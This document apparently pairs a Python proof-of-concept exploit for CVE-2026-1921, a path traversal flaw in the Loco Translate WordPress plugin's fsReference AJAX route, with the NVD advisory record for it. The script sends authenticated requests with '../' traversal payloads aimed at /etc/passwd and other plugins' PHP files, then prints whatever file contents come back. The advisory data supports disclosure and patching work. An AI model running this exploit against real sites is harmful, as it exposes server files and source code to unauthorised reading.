CVE-2026-1921

import requests # CVE-2026-1921 PoC Example # Target must have Loco Translate plugin installed and a user with Translator privileges. target_url = "http://example.com/wp-admin/admin-ajax.php" session_cookie = "wordpress_logged_in_xxxxxxxxxxxxxxxxx" # Replace with valid authenticated session cookie # The vulnerability allows reading .php, .js, .json, .twig files using directory traversal # Example payload to read a file outside the intended directory payload_data = { "action": "loco_json", "route": "fsReference", # Attempting to read wp-config.php is blocked, but other PHP files are accessible "ref": "../../../../../../etc/passwd" # This might fail based on extension check } # Valid payload for a PHP file (e.g., reading another plugin's file) payload_data_valid = { "action": "loco_json", "route": "fsReference", "ref": "../../../../../../path/to/another/plugin/file.php" } headers = { "Cookie": f"wordpress_logged_in_...={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=payload_data_valid, headers=headers) if response.status_code == 200: print("[+] Request sent successfully. Check response content for file data.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-1921", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:15:59.100", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2&new_path=%2Floco-translate/tags/2.8.3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve", "source": "[email protected]"}]}}